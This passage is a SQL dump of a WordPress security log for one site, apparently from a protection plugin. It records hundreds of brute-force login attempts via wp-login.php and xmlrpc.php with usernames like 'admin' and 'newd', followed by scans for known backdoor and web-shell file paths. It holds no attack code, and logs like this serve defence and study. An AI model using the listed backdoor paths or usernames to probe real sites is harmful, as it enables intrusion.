52,'kYbmqe9HV50DPLtzCjp7NKIE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.74.226',3642051298,'newd',0,1665475038.7324,7,'oEbBzRTFV7H8KdO90lCtxkDI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('133.130.103.36',2239915812,'newd',0,1665474452.4393,7,'iafANRmoKCU1z5WOuvq9Jp4G','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('66.29.138.73',1109232201,'admin',0,1665474308.0182,152,'HE9ItbBR4jch526wk7eiQKWm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.235.231.20',1089201940,'admin',0,1665474084.3336,152,'ynAGLRolf0kijM32hdaOv5Hq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.21.74',2884900170,'admin',0,1665473839.5795,152,'a4BpW6qCDjLoEf7NJk9yrQRx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.23.254.254',1125646078,'admin',0,1665473629.3499,152,'lB8XJkO3omwyjWeKxv0Lfg6d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.230.44.8',2649107464,'newd',0,1665473444.7370,7,'c0AhRHFtWMCELPXl8xf1Jjm9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.171.181.53',1739306293,'admin',0,1665473408.9559,152,'0LbVz6QWrHAPIRsUSdte84jp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.61.228',3165011428,'newd',0,1665473011.2519,7,'OG2pXgmE5ZkydPrFIfVi8UTA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.149.229',2671875557,'admin',0,1665472991.8554,152,'5b1iGUDKTeuR9ZgMrdLOkVqx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.225.76.130',3286322306,'admin',0,1665472722.9271,152,'saB5DRcqd0Qfj9vwVt2FZJkW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.68.228.235',860153067,'admin',0,1665472506.8275,152,'9xqBoGufZ6lRIKHMdwX82OTb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.91.88.30',2421905438,'newd',0,1665472446.9096,7,'TRwKoUksc7LSge5uqV1Ojz9B','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.154.177.165',1738191269,'admin',0,1665472288.6225,152,'QYKrGOgFJWpmRyzCxaVE1HN9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.29.76.78',1209879630,'admin',0,1665472088.5260,152,'EOditeJoz6GyhVBbR9FLYDgj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.198.112',2769733232,'newd',0,1665472020.2563,7,'UdVhJCvGYm3T74EIQSWf1sxP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.95.112.79',2522837071,'admin',0,1665478439.3033,152,'67F9anyWYhgVSXzP0GDCZmcp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.153.214.231',1738135271,'admin',0,1665478200.1007,152,'tNMhG0kXwoFx3Jn7lU6KHadi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('94.231.86.20',1592219156,'newd',0,1665478139.0483,7,'QBe1W6nytiuFGOzEjM0JSNHm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('122.17.148.164',2047972516,'admin',0,1665477944.6475,152,'BLqH9j4QhrYsiol358yEeMID','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.90.175',1701010095,'admin',0,1665477692.7750,152,'J5KRoTpn38vkIC46OMsteXrW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.103.4.29',3563521053,'newd',0,1665477547.9689,7,'MnYFRjcltr3L1e9GgmqNyJXu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.101.117.50',778401074,'admin',0,1665477183.3229,152,'LTH6jeBJSWoxIsdyPq5MpkRc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.65.212.122',1296159866,'newd',0,1665477119.9671,7,'qT5O80fQtVJG9gmcLh4X71Ul','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.231.112.85',736587861,'admin',0,1665476913.0432,152,'xYevDn8LZjcUNVs54TlMXoOE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.6.209',2335901393,'admin',0,1665476672.5601,152,'fxkSUYIliXgORnK6owC9FL3u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.76.63.113',575422321,'newd',0,1665476530.7998,7,'rGytoacbShzx4PdTF5BmvLKe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.95.146.83',1432326739,'admin',0,1665476408.9272,152,'WOCtur7YUIFdKVgoTAj1mhci','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'admin',0,1665476215.7359,152,'ilAwGz3DIRmM8OyxbeVL752h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.200.228',2671888612,'newd',0,1665476076.3303,7,'lUbZQgWrSECNIYXepijGRc2h','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.23.254.254',1125646078,'admin',0,1665475711.5140,152,'fUjRCBq0FSKdbs5rT9pDlJaY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.63.80.162',775901346,'newd',0,1665475476.9310,7,'RUD5nZ7d3yFk41AclzvqKCjS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.117.30',2335929630,'admin',0,1665475440.9878,152,'8Hc4Uj0BeukPJRoLhViEI2fv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.83',2090732627,'admin',0,1665475217.2539,152,'v9RzY4Ve5mDo8LaEbOZtd1cf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1665481706.8591,7,'tE9fq6YCST4o0JFgrQDNdueZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.53.17',1364735249,'admin',0,1665481642.9113,152,'P435YIOZqSdwcitUKT9mCBzL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.36',3168018980,'admin',0,1665481414.2269,152,'klG8YDRFfro2Ji0xtNQu6bhv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.63.80.162',775901346,'newd',0,1665481272.9727,7,'5gz2pGFrPxj6CaJ3MsdlOAKH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.95.146.83',1432326739,'admin',0,1665481102.7606,152,'8BtcDu5xQhMyeWLS2CZKrmEo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.222.54.214',2984130262,'admin',0,1665480858.1338,152,'eLViJBTEmRzr3l79NkZ4oh1c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1665480678.2635,7,'w2bBjWAE9z3JRFSfi0hsI7DT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.64.58',872366138,'admin',0,1665480596.9647,152,'C8o7vt91LweDOpkhauXK2QPA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.168.97.89',1839751513,'newd',0,1665480234.1243,7,'EZol1pF2NP3h5usVJBRK9tcv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('66.175.217.71',1118820679,'admin',0,1665480016.2641,152,'K6hd3YwFMfjxZWO4pe7UEruc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.115.100.180',3228787892,'admin',0,1665479818.5284,152,'VeP3XGtFRzATkvxNMsj20Hr5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.101.150.34',778409506,'newd',0,1665479625.6860,7,'U3KNusMTRcGHpeg0lWOykXIS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.27.238.234',1729883882,'admin',0,1665479525.6508,152,'oPHQpx7DycTWL38zq6bsmfrd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.107.137.177',661359025,'admin',0,1665479271.4053,152,'U50hl2aX9oIRTFwx1dturMv8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1665479181.6941,7,'Cn82hGRSFPWTHiLBkYdfrutb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('158.255.80.210',2667532498,'admin',0,1665478989.6941,152,'XKLOJDryel7uMBqQTxkv2mUV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.224.85.64',316691776,'newd',0,1665493208.7541,152,'CIUlT8PAM5BKJOua2wbtjV37','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.110.92.155',3564002459,'newd',0,1665485855.3223,7,'AFcMdU1YtgEpsKvf3RjHkb6y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.70.98.118',2084987510,'newd',0,1665485817.1726,152,'NEXgYt4IP5liDrMmswVjebnC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1665485432.6359,7,'9jcmSerwBZNQ7CEa3bzsX0nP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.76.135.117',223119221,'admin',0,1665484939.2476,152,'ZWpNVRTSc7nxDP6flwrJI23a','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.248.59.66',2516073282,'newd',0,1665484824.4067,7,'UXGZasHY17A0xr9klhc6nW4p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('158.255.80.210',2667532498,'admin',0,1665484707.3490,152,'cxbJM1kBn72ugmOatC5iZqlW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.129.222.91',1736564315,'newd',0,1665484392.4957,7,'t59HSOGdPYilANueRjrhTxLw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.248.80.191',1761104063,'admin',0,1665484389.0497,152,'t5gTurORqoEP3mhSpaj1fHDV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.29.138.73',1109232201,'admin',0,1665484149.2108,152,'lQfvJyIjEhLt9xVu1p7sgRMP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1665483804.9958,7,'E3KwAYPZz1IRrHu6tfB2bldG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1665483358.3464,7,'P70c3EOBUYkfrtVx182pCLhn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.244.254',2487809278,'admin',0,1665483283.2608,152,'kW1socn7TdLPjQJHeRNhg4xA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.174.248.107',3652122731,'admin',0,1665483030.2057,152,'EMFSl3Atj4X7xOIqJT5ienk8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.251.219.111',1358682991,'admin',0,1665482759.0445,152,'M2fUBOHu91tPYVszhw5xc0RZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('14.225.255.250',249692154,'newd',0,1665482757.1199,7,'Jfnr5TOziQ6HgheLXxwWqCcE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('195.93.152.83',3277690963,'admin',0,1665482510.5788,152,'az6HFk8O1CDKZB5v0rQMiWw9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1665489576.9242,7,'kQsGwrn3P6YMdfmlSjyUKu8x','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1665489296.9489,152,'afr5cFW8M4oJUgQjYpzlVe3q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.205.115',2160577907,'newd',0,1665488695.1251,152,'l94pAIVOjzoktQZUcgyYDTEu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.152.108',1168349292,'newd',0,1665488532.3012,7,'fQqizALDV9mCYn8KwEh5327F','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.13.99',1807551843,'Joyce',0,1665488476.1804,152,'6kqwtu4ag5bv1SAYLe2KpDCm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.196.152.3',2344916995,'newd',0,1665488381.6098,152,'YmFKE4uPb5G1nNhezojSAXqZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'newd',0,1665488125.6810,152,'cB0eDuw9kxWEnHIUhrd2CPMA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1665487931.0144,7,'RsiSleNXj3OcbECJva0n9tHQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1665487836.3690,152,'mY8USAdZnOE1zkDh56KPMxvG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.109.135',2160553351,'newd',0,1665487218.5072,152,'esY2JAoi3VD9W7OGzwNum5T8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.210',1364735186,'newd',0,1665486966.2271,152,'nw4UlR7qSPTCyO2zjxH8DhEX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.47.206',861482958,'newd',0,1665486894.0095,7,'HkDifpuR51G6Y7lhyIJcAzVQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('41.93.82.7',693981703,'newd',0,1665486389.2445,152,'OBDeHjEMgKq9VxvU6ws7icSF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.146.202.150',1737673366,'newd',0,1665486064.5704,152,'QnFCBO9Wkia7SLjJ82UcN5rZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.153.214',3497105878,'newd',0,1665493185.3833,7,'R8SYlxVPWvz7C3sD4nKXugyO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('116.62.155.4',1950259972,'newd',0,1665492926.8868,152,'1CWfoBFOPvhbEl0t2uDksZpx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.217.190.82',3000614482,'newd',0,1665492740.9063,7,'FRlHfNuxYhUbv6Qp1ArXMnKi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('172.104.81.115',2892517747,'newd',0,1665492599.0670,152,'SKoil8gYMRAbUWPJrL52dfTv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.99.229.218',392422874,'newd',0,1665492129.5000,7,'Pyo5XsxUN029vg4cdRJ8Hik7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.79.144.41',860852265,'newd',0,1665492001.7531,152,'gBv5iIERocfpdzMslNHXmjhP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.46.121.66',3106830658,'newd',0,1665491702.0172,152,'ImOUVfR8rcda5E4XeCb6QygH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.63.80.162',775901346,'newd',0,1665491683.0931,7,'lIwPOczFe2Z57hmbq9sLkviA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1665491363.4003,152,'KfXSykzYHDcBwlFiPmRjt0A8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.53.24',736179480,'newd',0,1665491100.7706,152,'J4uArd6wMlUptW73mzkq0INo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.169.240',2917968368,'newd',0,1665491083.7078,7,'Qnrx901BL2kTPq6fouMzUCbW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.39.212.31',1294455839,'newd',0,1665490622.0157,7,'8EG9clSJoitfRIO3YgHPjZpF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.209.0',2487800064,'newd',0,1665490489.6290,152,'c9tay2HKViM7UB5IZLRd8JP4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.169.30.9',3198754313,'newd',0,1665490150.7078,152,'BERIJcWxSyidZL6XVkwFPM0z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.114.185.76',1567799628,'newd',0,1665490020.5329,7,'OxTHMUup4ZRiYnW5XNEebFd6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.223.186.76',2682239564,'newd',0,1665489878.6960,152,'uAX1aRkCKDcO2Neg3GwimLqp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.171.170.94',3198921310,'admin',0,1665496760.8869,152,'dZgTQK7ratqU8PY9lNoi5mRJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1665496395.7063,7,'OFW4hz5fJ98CYrKatMu2cUAG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.124.182',3451485366,'Joyce',0,1665495719.9784,152,'2Wwrf67lXQLtabBdGekh0DEZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'wwwadmin',0,1665495202.4871,152,'6NIAjtMUu78YypkH91Vdm4xP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.48.183',3328323767,'Joyce',0,1665494990.6296,152,'5cNjYIanposhrVKUPB92wglW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.170.41',2673453609,'wadminw',0,1665494890.3437,152,'Yaj15pAPyRVHsBCIDtNkUczh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.112.72.51',3413133363,'wadminw',0,1665494597.2558,152,'HFuNQPMfhm0WLrgspJ8eKI1l','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.168.97.89',1839751513,'newd',0,1665494251.3378,7,'xyuQ18tGkpcYXE6ongaHBWOL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1665493820.3352,152,'8vZTEDpg0SUHzQBOkKR19Nrh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1665493796.8733,7,'zgwsVjF1qdpHAf30IrtLU6QG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.83.187',861623227,'newd',0,1665493564.6061,152,'U0JhpFvXgdOVERrbIcSsx3ut','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'admin',0,1665500379.3380,152,'eyuB9pZUag3IcfsnizK4MwdE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.138.120',267094648,'wwwadmin',0,1665498599.5957,152,'2VaSE1bsKM4DpIUer3g8OXdm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1665498505.5729,7,'yEZlAQHkjRCqesuWK0Yowf5G','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.79.144.41',860852265,'wwwadmin',0,1665498329.3392,152,'4aUz2BDNK10xvoIOCF9yAhpH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'wadminw',0,1665497988.5705,152,'BKZjwQUIH4fnpzWTq1vXrYyl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.196.103',1109509223,'',0,1665497420.4096,55,'Fi09ctMoWkAQRSgTJ2hv46Yu','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('193.176.230.188',3249596092,'admin',0,1665497415.2551,152,'7kMQpGOvBEXfFIAPtSs1Vcyo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.209.28',2994786588,'admin',0,1665497045.5695,152,'KJ5b2Tl1aWExe3vSm7CnyUqi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.248.59.66',2516073282,'newd',0,1665503872.4231,7,'5iyDx2uWTaPsMvZhqGc4UAYl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1665502718.3901,7,'W1wFy7LBSrEz0iRXCApVZaej','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.240.30.198',2733645510,'wwwadmin',0,1665501778.4838,152,'SyAOpwn9uRUZWH8GxJ3EXKqQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.0.178.38',1090564646,'wadminw',0,1665501104.6832,152,'z9A2hJkx3IcMBYSVfopKjlGd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.222.69',1363467845,'wadminw',0,1665500814.1532,152,'mcqU4CQy3OjJsxbzoHK01LvZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.152.148',2917963924,'newd',0,1665500601.1190,7,'6GnMTsprZkUOXFuBy7lv43gx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.236.176.107',2917970027,'newd',0,1665506999.7918,7,'Ux6bIG12W3cqtHMFh0Xwd45k','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'newd',0,1665506570.5298,7,'UR6ktgTDu7EWx1J02jAcNBLn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1665506137.7176,152,'aMHpWRi47OmdzcVvCI1QGNY0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.63.47',2806464303,'newd',0,1665504699.9492,7,'97bVO2iNw3fI4sojKMnWLkex','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.121.12',2680912140,'newd',0,1665511532.9163,7,'BeZuo18OcSH92jq4dtQhRKTx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.236.152.148',2917963924,'newd',0,1665510831.8745,7,'FqI0tEdyDpAW7e85TjibQSrl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.47.94',3515690846,'Joyce',0,1665510462.0800,152,'iwk41YtzoXBjRm9LrHqpvEVx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1665510398.9145,7,'R8zKAFCxr7GvmbYpde5ngfjZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.51.74',3328324426,'Joyce',0,1665508937.0311,152,'tofaVNx7gXd2spkOAzWuSH3m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.71.174',1152862126,'newd',0,1665508526.9149,7,'l5KcIPpM3im9e2kN1orwfZSj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.91.88.30',2421905438,'newd',0,1665518586.9304,7,'iRUGTWSFYcX0mNAyudr2lQCH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('78.142.50.85',1317941845,'newd',0,1665514719.2616,7,'wpehqrCLkoYVI4DN25yvMnXj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665514267.8052,7,'z5dQfoMGeynBaYCJXO6Hh1F0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.175.66.138',3585032842,'newd',0,1665512385.3687,7,'T8fRzeJuEkwXP1NMVDbHAOnU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('136.243.19.225',2297631713,'newd',0,1665518128.4006,7,'GAHf9Vw8NBP0bQ37zaegRTsU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.116.110',2160555118,'',0,1665517710.3963,55,'plKN92MjPs5wVkrSHcbaxQve','','19|0|0|0|cteisys.com/about.php',0,19,0),('20.26.114.74',337277514,'',0,1665516559.6611,55,'QJASnwIKrXZPbt9VRqCclM8k','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.26.114.74',337277514,'',0,1665516555.4111,55,'EHjIDQNphVZBJFAWuie91KLs','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('47.110.72.238',795756782,'newd',0,1665516250.5438,7,'B9bNcmPVj4hLKEu8rJYf2gOq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('37.120.217.243',628677107,'joyce',0,1665515957.1068,152,'NHlS4RbW81yCxofs3UeP9DEd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.41.221.5',1747574021,'newd',0,1665521996.5070,7,'k2BRYLwqOVUrE4hazgTIXClt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.246.208',2650142416,'newd',0,1665520114.9452,7,'k7QeiwGZgCsTraVucXOKhWxm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.34.14',1218912782,'newd',0,1665519284.4105,7,'msE40vUQBPtLiRAlN1If6zjY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.151.98.163',3650577059,'joyce',0,1665528569.0878,152,'oEe03nPj9CSbvG1ihZOkQlBK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('166.62.125.246',2789113334,'newd',0,1665527835.5364,7,'qVBjKQORZGA47zasIm9kdib5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.249.31.157',2918784925,'',0,1665527205.5087,55,'UrPMhy1TmFEJBflCSD34sp0n','','19|0|0|0|cteisys.com/wp-content/plugins/wp-classic_editor/werdt/werd.php',0,19,0),('173.249.31.157',2918784925,'',0,1665527110.7700,55,'Of2VKj58dTBEuz4ahHir7pYg','','19|0|0|0|cteisys.com/wp-content/plugins/lite-cache/index.php',0,19,0),('173.249.31.157',2918784925,'',0,1665527076.4167,55,'8GmDh2Qx4jHi7cMqJbvCKzBn','','19|0|0|0|cteisys.com/wp-content/plugins/wp-dester/dester/wp-dester.php',0,19,0),('173.249.31.157',2918784925,'',0,1665527074.4844,55,'2l3ciZjd5MtsqDnbeCv4JFRf','','19|0|0|0|cteisys.com/wp-content/plugins/wp-classic/wp-classic/wp-classic.php',0,19,0),('173.249.31.157',2918784925,'',0,1665527039.7546,55,'7ZDhEi0PRfv8W52GSBUmFCHl','','19|0|0|0|cteisys.com/wp-content/plugins/wp-roilback/includes/roilback.php',0,19,0),('204.48.26.148',3425704596,'',0,1665527020.2974,55,'hvtKoGy7L2XuDVZeR5PB8YE9','','19|0|0|0|cteisys.com/wp-content/wp-files-conficg.php',0,19,0),('204.48.26.148',3425704596,'',0,1665527015.5130,55,'PqEpbcFgkXRH9VfxoMJz31wK','','19|0|0|0|cteisys.com/wp-content/wp-file-conficg.php',0,19,0),('204.48.26.148',3425704596,'',0,1665527007.0858,55,'vksdac8FXUjZ6m7VegtuyxJT','','19|0|0|0|cteisys.com/wp-content/wordpress-index-keyword.php',0,19,0),('145.239.30.120',2448367224,'newd',0,1665527006.8361,7,'Yl09w52Kps7XfvtNAImhkGBP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.249.31.157',2918784925,'',0,1665526839.4486,10,'hVzBEQUWRuC81nNL6wsTqbPp','','707|0|0|0|cteisys.com/wp-content/plugins/wp-classic_editor/werdt/werd.php',0,707,0),('173.249.31.157',2918784925,'',0,1665526839.4457,55,'hVzBEQUWRuC81nNL6wsTqbPp','','19|0|0|0|cteisys.com/wp-content/plugins/wp-classic_editor/werdt/werd.php',0,19,0),('173.249.31.157',2918784925,'',0,1665526812.8888,55,'Y3EvHb7FxpIwRkBUjKGeWQMa','','19|0|0|0|cteisys.com/wp-content/plugins/core-builder/index.php',0,19,0),('173.249.31.157',2918784925,'',0,1665526794.0062,55,'yBkglEvT3Y8th9b4URVuDKIz','','19|0|0|0|cteisys.com/wp-content/plugins/task-controller/index.php:petemartin.com',0,19,0),('173.249.31.157',2918784925,'',0,1665526750.8344,55,'DNkc0zPnKsMCJAv1p36uI2a5','','19|0|0|0|cteisys.com/wp-content/plugins/wp-roilbask/includes/roilbask.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524386.8345,55,'4AIEo1bNy0wxJCFKaOD5Y3vh','','19|0|0|0|cteisys.com/wp-static.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524385.6695,55,'oYOJAzXy6FnHcU0d93bTCStv','','19|0|0|0|cteisys.com/wp-content/uploads/wp-queryall.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524384.0796,55,'7tlVyFDOqoBkYCAILbZaiW5N','','19|0|0|0|cteisys.com/wp-queryall.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524382.9034,55,'MJtyshBcE1HDl3Kw7pokCnAG','','19|0|0|0|cteisys.com/wp-content/themes/classic/inc/index.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524381.5159,55,'cSYt2am5NxvG0BOXKJpRVr9T','','19|0|0|0|cteisys.com/wp-content/themes/twentythree/inc/index.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524380.2370,55,'Hv5wqmF8YgLkneBC2sicZxDU','','19|0|0|0|cteisys.com/wp-content/plugins/networker/networker.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524379.1584,55,'3VhQ5yrdZYcJw2ma6S8X7Njb','','19|0|0|0|cteisys.com/wp-content/plugins/wp-light/wp-light.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524371.6922,55,'Gig4KTmht5Yu9qoEB3axMRPQ','','19|0|0|0|cteisys.com/wp-plain.php.suspected',0,19,0),('178.128.111.192',2994761664,'',0,1665524370.6409,55,'30d8DGJILRO4yBfKWgbAzetN','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524369.5646,55,'XY35aJgV2TnBxltKo8MuDqpF','','19|0|0|0|cteisys.com/wp-system-opencloud.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524368.4749,55,'pMQtDXb6N5Ev72qyliJ1U4uf','','19|0|0|0|cteisys.com/wp-system-cloud.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524367.3760,55,'xM6pTDAEJuw7kefOoS9C2Lsl','','19|0|0|0|cteisys.com/wp-shield-icon-managed.php',0,19,0),('178.128.111.192',2994761664,